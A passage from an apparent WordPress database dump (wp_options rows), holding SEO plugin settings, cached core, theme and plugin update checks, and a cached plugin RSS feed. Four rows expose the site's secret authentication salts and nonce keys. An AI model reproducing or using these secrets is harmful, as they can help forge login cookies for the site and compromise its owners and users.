%%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:13:\"title-houdini\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:16:\"metadesc-houdini\";s:0:\"\";s:15:\"metakey-houdini\";s:0:\"\";s:15:\"noindex-houdini\";b:0;s:16:\"showdate-houdini\";b:0;s:19:\"hideeditbox-houdini\";b:0;s:13:\"title-service\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:16:\"metadesc-service\";s:0:\"\";s:15:\"metakey-service\";s:0:\"\";s:15:\"noindex-service\";b:0;s:16:\"showdate-service\";b:0;s:19:\"hideeditbox-service\";b:0;s:11:\"title-staff\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:14:\"metadesc-staff\";s:0:\"\";s:13:\"metakey-staff\";s:0:\"\";s:13:\"noindex-staff\";b:0;s:14:\"showdate-staff\";b:0;s:17:\"hideeditbox-staff\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;s:26:\"title-tax-service-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:29:\"metadesc-tax-service-category\";s:0:\"\";s:28:\"metakey-tax-service-category\";s:0:\"\";s:32:\"hideeditbox-tax-service-category\";b:0;s:28:\"noindex-tax-service-category\";b:0;s:20:\"title-tax-department\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:23:\"metadesc-tax-department\";s:0:\"\";s:22:\"metakey-tax-department\";s:0:\"\";s:26:\"hideeditbox-tax-department\";b:0;s:22:\"noindex-tax-department\";b:0;}','yes'),(113,'auth_salt','Ru<uS5~J<5E+`c?v=QV(<p]Z$Pgq+/V_TU$H+831q~&c-9Hc9f$Q6L=>LK}k0{~}','yes'),(115,'logged_in_salt','sN1YY8z>?nNT:_be70yPUKL+o>=ch6lc0A;+kt6,_|6y%{(M;#y2H*JE<%;|X>.{','yes'),(116,'nonce_key','~D3chC3DK1#a4Jl!UMjUwC0^},~IH_.0JZA/q- MXd>C]J`YUw/^O[K{~N7ld_O:','yes'),(117,'nonce_salt','+VyGCa_Te&~Ygj)1C|2/}E%Dt$gkxF4mUAx^u>qREX~1r%zd=Mfqjruj%t^dXUr^','yes'),(118,'jetpack_options','a:2:{s:7:\"version\";s:16:\"2.2.7:1402803364\";s:11:\"old_version\";s:16:\"2.2.7:1402803364\";}','yes'),(34364,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:10:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.8.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.8.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-4.8-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-4.8-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"4.8\";s:7:\"version\";s:3:\"4.8\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.8.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-4.8.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-4.8-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-4.8-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"4.8\";s:7:\"version\";s:3:\"4.8\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.7.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.7.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.7.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.7.5-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.7.5\";s:7:\"version\";s:5:\"4.7.5\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:3;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.6.6.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.6.6.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.6.6-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.6.6-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.6.6\";s:7:\"version\";s:5:\"4.6.6\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:4;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.9.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.5.9.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.5.9-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.5.9-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.5.9\";s:7:\"version\";s:5:\"4.5.9\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:5;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.4.10.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.4.10.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.4.10-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.4.10-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.4.10\";s:7:\"version\";s:6:\"4.4.10\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:6;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.3.11.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.3.11.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.3.11-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.3.11-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.3.11\";s:7:\"version\";s:6:\"4.3.11\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:7;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.2.15.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.2.15.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.2.15-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.2.15-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.2.15\";s:7:\"version\";s:6:\"4.2.15\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:8;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.1.18.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.1.18.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.1.18-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.1.18-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.1.18\";s:7:\"version\";s:6:\"4.1.18\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}i:9;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.0.18.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.0.18.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.0.18-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.0.18-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.0.18\";s:7:\"version\";s:6:\"4.0.18\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1497413058;s:15:\"version_checked\";s:6:\"3.9.19\";s:12:\"translations\";a:0:{}}','yes'),(35115,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1497413063;s:7:\"checked\";a:19:{s:6:\"ahimsa\";s:3:\"3.2\";s:7:\"arclite\";s:4:\"2.02\";s:11:\"arras-theme\";s:5:\"1.3.5\";s:9:\"atahualpa\";s:6:\"3.7.11\";s:20:\"cordobo-green-park-2\";s:7:\"0.9.502\";s:5:\"corp2\";s:2:\"v1\";s:6:\"fusion\";s:3:\"3.1\";s:13:\"grayCorporate\";s:2:\"v1\";s:5:\"inove\";s:5:\"1.4.6\";s:14:\"lightspersonal\";s:4:\"1.00\";s:9:\"lightword\";s:7:\"2.0.0.6\";s:10:\"monochrome\";s:5:\"3.0.4\";s:15:\"orangeCorporate\";s:2:\"v1\";s:5:\"paeon\";s:5:\"1.0.8\";s:5:\"pixel\";s:5:\"2.0.2\";s:5:\"trees\";s:2:\"v1\";s:14:\"twentyfourteen\";s:3:\"1.1\";s:14:\"twentythirteen\";s:3:\"1.2\";s:12:\"twentytwelve\";s:3:\"1.4\";}s:8:\"response\";a:4:{s:9:\"atahualpa\";a:4:{s:5:\"theme\";s:9:\"atahualpa\";s:11:\"new_version\";s:6:\"3.7.24\";s:3:\"url\";s:39:\"https://wordpress.org/themes/atahualpa/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/atahualpa.3.7.24.zip\";}s:14:\"twentyfourteen\";a:4:{s:5:\"theme\";s:14:\"twentyfourteen\";s:11:\"new_version\";s:3:\"2.0\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentyfourteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentyfourteen.2.0.zip\";}s:14:\"twentythirteen\";a:4:{s:5:\"theme\";s:14:\"twentythirteen\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentythirteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentythirteen.2.2.zip\";}s:12:\"twentytwelve\";a:4:{s:5:\"theme\";s:12:\"twentytwelve\";s:11:\"new_version\";s:3:\"2.3\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwelve/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwelve.2.3.zip\";}}s:12:\"translations\";a:0:{}}','yes'),(35116,'_site_transient_update_plugins','O:8:\"stdClass\":3:{s:12:\"last_checked\";i:1497413062;s:8:\"response\";a:4:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":8:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"3.3.2\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.3.3.2.zip\";s:6:\"tested\";s:5:\"4.7.5\";s:13:\"compatibility\";a:0:{}}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";O:8:\"stdClass\":8:{s:2:\"id\";s:44:\"w.org/plugins/google-analytics-for-wordpress\";s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:6:\"plugin\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:11:\"new_version\";s:5:\"6.2.0\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/google-analytics-for-wordpress/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/google-analytics-for-wordpress.6.2.0.zip\";s:6:\"tested\";s:5:\"4.8.0\";s:13:\"compatibility\";a:0:{}}s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":8:{s:2:\"id\";s:38:\"w.org/plugins/google-sitemap-generator\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:5:\"4.0.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/google-sitemap-generator.4.0.8.zip\";s:6:\"tested\";s:5:\"4.7.1\";s:13:\"compatibility\";a:0:{}}s:27:\"wp-super-cache/wp-cache.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/wp-super-cache\";s:4:\"slug\";s:14:\"wp-super-cache\";s:6:\"plugin\";s:27:\"wp-super-cache/wp-cache.php\";s:11:\"new_version\";s:5:\"1.4.9\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/wp-super-cache/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wp-super-cache.1.4.9.zip\";s:14:\"upgrade_notice\";s:146:\"<p>Fixed XSS on the settings page, settings page updates, file locking fixes and PHP 7.1 fix, caching fixes on static homepage blogs and more.</p>\";s:6:\"tested\";s:3:\"4.8\";s:13:\"compatibility\";a:0:{}}}s:12:\"translations\";a:0:{}}','yes'),(26518,'_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109','1469426403','no'),(26516,'_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109','1469426403','no'),(26517,'_transient_feed_b9388c83948825c1edaef0d856b7b109','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:117:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress Plugins » View: Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress Plugins » View: Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 24 Jul 2016 17:51:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"25254@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Regenerate Thumbnails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/plugins/regenerate-thumbnails/#post-6743\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 23 Aug 2008 14:38:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"6743@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"Allows you to regenerate your thumbnails after changing the thumbnail sizes.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Alex Mills (Viper007Bond)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"15@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"W3 Total Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/w3-total-cache/#post-12073\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2009 18:46:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"12073@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Easy Web Performance Optimization (WPO) using caching: browser, page, object, database, minify and content delivery network support.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Frederick Townes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n 